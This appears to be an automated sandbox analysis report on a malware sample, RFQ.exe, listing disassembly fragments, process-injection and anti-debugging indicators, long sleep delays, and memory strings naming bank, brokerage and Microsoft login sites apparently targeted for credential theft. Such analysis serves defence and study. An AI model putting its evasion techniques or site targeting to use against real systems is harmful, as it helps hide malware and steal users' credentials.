                Source: RFQ.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                Source: RFQ.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                Source: RFQ.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                Source: C:\Users\user\Desktop\RFQ.exe Code function: 0_2_0074E01E LoadLibraryA,GetProcAddress,0_2_0074E01E
                Source: C:\Users\user\Desktop\RFQ.exe Code function: 0_2_0074288B push 66007423h; retn 007Ah 0_2_007428E1
                Source: C:\Users\user\Desktop\RFQ.exe Code function: 0_2_00756B05 push ecx; ret 0_2_00756B18
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00401ACE push eax; iretd 2_2_00401B68
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_004061DF push FFFFFF9Bh; retf 2_2_004061E1
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0040AA1D push edi; retf 2_2_0040AA23
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00401B40 push eax; iretd 2_2_00401B68
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0041933F push ss; ret 2_2_00419355
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00405BF7 push FFFFFFE2h; iretd 2_2_00405BFD
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00404BB6 push ds; iretd 2_2_00404BB8
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00403420 push eax; ret 2_2_00403422
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00413CE3 push es; retf 2_2_00413D12
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00418F53 push esp; ret 2_2_00419157
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0040AF60 push 0000007Bh; iretd 2_2_0040AF62
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0390225F pushad ; ret 2_2_039027F9
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039027FA pushad ; ret 2_2_039027F9
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039309AD push ecx; mov dword ptr [esp], ecx 2_2_039309B6
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0390283D push eax; iretd 2_2_03902858
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03901368 push eax; iretd 2_2_03901369
                Source: C:\Windows\SysWOW64\net.exe Code function: 4_2_036E225F pushad ; ret 4_2_036E27F9
                Source: C:\Windows\SysWOW64\net.exe Code function: 4_2_036E27FA pushad ; ret 4_2_036E27F9
                Source: C:\Windows\SysWOW64\net.exe Code function: 4_2_037109AD push ecx; mov dword ptr [esp], ecx 4_2_037109B6
                Source: C:\Windows\SysWOW64\net.exe Code function: 4_2_036E283D push eax; iretd 4_2_036E2858
                Source: C:\Windows\SysWOW64\net.exe Code function: 4_2_02EE27D4 push FFFFFFE2h; iretd 4_2_02EE27DA
                Source: C:\Windows\SysWOW64\net.exe Code function: 4_2_02EF08C0 push es; retf 4_2_02EF08EF
                Source: C:\Windows\SysWOW64\net.exe Code function: 4_2_02F00E6A push esp; retf 4_2_02F00E6B
                Source: C:\Windows\SysWOW64\net.exe Code function: 4_2_02EE2DBC push FFFFFF9Bh; retf 4_2_02EE2DBE
                Source: C:\Windows\SysWOW64\net.exe Code function: 4_2_02EE1793 push ds; iretd 4_2_02EE1795
                Source: C:\Windows\SysWOW64\net.exe Code function: 4_2_02EE75FA push edi; retf 4_2_02EE7600
                Source: C:\Windows\SysWOW64\net.exe Code function: 4_2_02EE7B3D push 0000007Bh; iretd 4_2_02EE7B3F
                Source: C:\Windows\SysWOW64\net.exe Code function: 4_2_02EF5B30 push esp; ret 4_2_02EF5D34
                Source: C:\Windows\SysWOW64\net.exe Code function: 4_2_02EFB83A push esp; iretd 4_2_02EFB85B
                Source: C:\Users\user\Desktop\RFQ.exe Code function: 0_2_00798111 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_00798111
                Source: C:\Users\user\Desktop\RFQ.exe Code function: 0_2_0074EB42 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_0074EB42
                Source: C:\Users\user\Desktop\RFQ.exe Code function: 0_2_0075123A __initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_0075123A
                Source: C:\Users\user\Desktop\RFQ.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\RFQ.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\net.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\net.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\net.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\net.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\net.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                Source: C:\Users\user\Desktop\RFQ.exe API/Special instruction interceptor: Address: 1066EE4
                Source: C:\Windows\SysWOW64\net.exe API/Special instruction interceptor: Address: 7FF8C88ED324
                Source: C:\Windows\SysWOW64\net.exe API/Special instruction interceptor: Address: 7FF8C88ED7E4
                Source: C:\Windows\SysWOW64\net.exe API/Special instruction interceptor: Address: 7FF8C88ED944
                Source: C:\Windows\SysWOW64\net.exe API/Special instruction interceptor: Address: 7FF8C88ED504
                Source: C:\Windows\SysWOW64\net.exe API/Special instruction interceptor: Address: 7FF8C88ED544
                Source: C:\Windows\SysWOW64\net.exe API/Special instruction interceptor: Address: 7FF8C88ED1E4
                Source: C:\Windows\SysWOW64\net.exe API/Special instruction interceptor: Address: 7FF8C88F0154
                Source: C:\Windows\SysWOW64\net.exe API/Special instruction interceptor: Address: 7FF8C88EDA44
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00418F53 rdtsc 2_2_00418F53
                Source: C:\Windows\SysWOW64\net.exe Window / User API: threadDelayed 9842
                Source: C:\Users\user\Desktop\RFQ.exe Evaded block: after key decision graph_0-95027
                Source: C:\Users\user\Desktop\RFQ.exe Evaded block: after key decision graph_0-95870
                Source: C:\Users\user\Desktop\RFQ.exe Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes graph_0-95442
                Source: C:\Users\user\Desktop\RFQ.exe API coverage: 4.3 %
                Source: C:\Windows\SysWOW64\svchost.exe API coverage: 0.6 %
                Source: C:\Windows\SysWOW64\net.exe API coverage: 2.7 %
                Source: C:\Windows\SysWOW64\net.exe TID: 940 Thread sleep count: 131 > 30
                Source: C:\Windows\SysWOW64\net.exe TID: 940 Thread sleep time: -262000s >= -30000s
                Source: C:\Windows\SysWOW64\net.exe TID: 940 Thread sleep count: 9842 > 30
                Source: C:\Windows\SysWOW64\net.exe TID: 940 Thread sleep time: -19684000s >= -30000s
                Source: C:\Program Files (x86)\kuDTOOcwiVdWlQPDkujIixANdwTkyBLAEiGaFiCvvzloAjFxomVKtSQk\enUILRNjDql.exe TID: 6516 Thread sleep time: -30000s >= -30000s
                Source: C:\Windows\SysWOW64\net.exe Last function: Thread delayed
                Source: C:\Windows\SysWOW64\net.exe Last function: Thread delayed
                Source: C:\Users\user\Desktop\RFQ.exe Code function: 0_2_00776CA9 GetFileAttributesW,FindFirstFileW,FindClose,0_2_00776CA9
                Source: C:\Users\user\Desktop\RFQ.exe Code function: 0_2_007760DD _wcscat,_wcscat,__wsplitpath,FindFirstFileW,DeleteFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,0_2_007760DD
                Source: C:\Users\user\Desktop\RFQ.exe Code function: 0_2_007763F9 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,0_2_007763F9
                Source: C:\Users\user\Desktop\RFQ.exe Code function: 0_2_0077EB60 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0077EB60
                Source: C:\Users\user\Desktop\RFQ.exe Code function: 0_2_0077F56F FindFirstFileW,FindClose,0_2_0077F56F
                Source: C:\Users\user\Desktop\RFQ.exe Code function: 0_2_0077F5FA FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_0077F5FA
                Source: C:\Users\user\Desktop\RFQ.exe Code function: 0_2_00781B2F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00781B2F
                Source: C:\Users\user\Desktop\RFQ.exe Code function: 0_2_00781C8A SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00781C8A
                Source: C:\Users\user\Desktop\RFQ.exe Code function: 0_2_00781F94 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00781F94
                Source: C:\Windows\SysWOW64\net.exe Code function: 4_2_02EFC820 FindFirstFileW,FindNextFileW,FindClose,4_2_02EFC820
                Source: C:\Users\user\Desktop\RFQ.exe Code function: 0_2_0074DDC0 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_0074DDC0
                Source: enUILRNjDql.exe, 00000006.00000002.4572265806.000000000098F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllW
                Source: F14431U2a.4.dr Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
                Source: F14431U2a.4.dr Binary or memory string: discord.comVMware20,11696428655f
                Source: F14431U2a.4.dr Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
                Source: F14431U2a.4.dr Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
                Source: F14431U2a.4.dr Binary or memory string: global block list test formVMware20,11696428655
                Source: F14431U2a.4.dr Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
                Source: net.exe, 00000004.00000002.4575572230.00000000081FA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: tVMware20,11696428655
                Source: F14431U2a.4.dr Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
                Source: F14431U2a.4.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
                Source: F14431U2a.4.dr Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
                Source: net.exe, 00000004.00000002.4572237813.00000000030C1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll_
                Source: F14431U2a.4.dr Binary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
                Source: F14431U2a.4.dr Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
                Source: F14431U2a.4.dr Binary or memory string: outlook.office365.comVMware20,11696428655t
                Source: F14431U2a.4.dr Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
                Source: F14431U2a.4.dr Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
                Source: F14431U2a.4.dr Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
                Source: firefox.exe, 00000008.00000002.2589774955.000001912AECC000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: F14431U2a.4.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
                Source: F14431U2a.4.dr Binary or memory string: outlook.office.comVMware20,11696428655s
                Source: F14431U2a.4.dr Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
                Source: F14431U2a.4.dr Binary or memory string: ms.portal.azure.comVMware20,11696428655
                Source: F14431U2a.4.dr Binary or memory string: AMC password management pageVMware20,11696428655
                Source: net.exe, 00000004.00000002.4575572230.00000000081FA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: netportal.hdfcbank.comVMware20,116
                Source: F14431U2a.4.dr Binary or memory string: tasks.office.comVMware20,11696428655o
                Source: F14431U2a.4.dr Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
                Source: F14431U2a.4.dr Binary or memory string: turbotax.intuit.comVMware20,11696428655t
                Source: F14431U2a.4.dr Binary or memory string: interactivebrokers.comVMware20,11696428655
                Source: F14431U2a.4.dr Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
                Source: F14431U2a.4.dr Binary or memory string: dev.azure.comVMware20,11696428655j
                Source: F14431U2a.4.dr Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
                Source: F14431U2a.4.dr Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
                Source: F14431U2a.4.dr Binary or memory string: bankofamerica.comVMware20,11696428655x
                Source: F14431U2a.4.dr Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
                Source: F14431U2a.4.dr Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
Source: C:\Users\user\Desktop\RFQ.exe | API call chain: ExitProcess graph end node (graph_0-94811)
Source: C:\Windows\SysWOW64\svchost.exe | Process information queried: ProcessInformation
Source: C:\Windows\SysWOW64\svchost.exe | Process queried: DebugPort
Source: C:\Windows\SysWOW64\net.exe | Process queried: DebugPort
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00418F53 rdtsc
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00417B93 LdrLoadDll
Source: C:\Users\user\Desktop\RFQ.exe | Code function: 0_2_00786AAF BlockInput
Source: C:\Users\user\Desktop\RFQ.exe | Code function: 0_2_00733D19 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW
Source: C:\Users\user\Desktop\RFQ.exe | Code function: 0_2_00763920 LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,IsDebuggerPresent,OutputDebugStringW
Source: C:\Users\user\Desktop\RFQ.exe | Code function: 0_2_0074E01E LoadLibraryA,GetProcAddress
Source: C:\Users\user\Desktop\RFQ.exe | Code function: 0_2_01067150 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\RFQ.exe | Code function: 0_2_010671B0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\RFQ.exe | Code function: 0_2_01065AF0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03928397 mov eax, dword ptr fs:[00000030h] (3 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0392E388 mov eax, dword ptr fs:[00000030h] (3 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0395438F mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039DE3DB mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039DE3DB mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039DE3DB mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039D43D4 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039EC3CD mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0393A3C0 mov eax, dword ptr fs:[00000030h] (6 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039383C0 mov eax, dword ptr fs:[00000030h] (4 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039B63C0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0394E3F0 mov eax, dword ptr fs:[00000030h] (3 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039663FF mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039403E9 mov eax, dword ptr fs:[00000030h] (8 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0392C310 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A08324 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A08324 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A08324 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03950310 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0396A30B mov eax, dword ptr fs:[00000030h] (3 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039B035C mov eax, dword ptr fs:[00000030h] (3 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039B035C mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039B035C mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039FA352 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039D8350 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h] (15 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039D437C mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A0634F mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0396E284 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039B0283 mov eax, dword ptr fs:[00000030h] (3 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039402A0 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039C62A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039C62A0 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039C62A0 mov eax, dword ptr fs:[00000030h] (4 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0393A2C3 mov eax, dword ptr fs:[00000030h] (5 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039402E1 mov eax, dword ptr fs:[00000030h] (3 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A062D6 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0392823B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0392A250 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03936259 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039EA250 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039B8243 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039B8243 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039E0274 mov eax, dword ptr fs:[00000030h] (12 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03934260 mov eax, dword ptr fs:[00000030h] (3 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0392826B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A0625D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039B019F mov eax, dword ptr fs:[00000030h] (4 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0392A197 mov eax, dword ptr fs:[00000030h] (3 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03970185 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039EC188 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039D4180 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A061E5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039AE1D0 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039AE1D0 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039AE1D0 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039F61C3 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039601F8 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039DA118 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039DA118 mov eax, dword ptr fs:[00000030h] (3 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039F0115 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039DE10E mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039DE10E mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039DE10E mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039DE10E mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039DE10E mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039DE10E mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039DE10E mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039DE10E mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03960124 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0392C156 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039C8158 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A04164 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03936154 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039C4144 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039C4144 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039C4144 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0393208A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039F60B8 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039F60B8 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039280A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039C80A8 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039B20DE mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0392C0F0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039720F0 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0392A0E3 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039380E9 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039B60E0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0394E016 mov eax, dword ptr fs:[00000030h] (4 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039B4000 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039D2000 mov eax, dword ptr fs:[00000030h] (8 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039C6030 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0392A020 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0392C020 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03932050 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039B6050 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0395C073 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039D678E mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039307AF mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039E47A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0393C7C0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039B07C3 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039347FB mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039527ED mov eax, dword ptr fs:[00000030h] (3 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039BE7E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03930710 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03960710 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0396C700 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0396273C mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0396273C mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0396273C mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039AC730 mov eax, dword ptr fs:[00000030h]
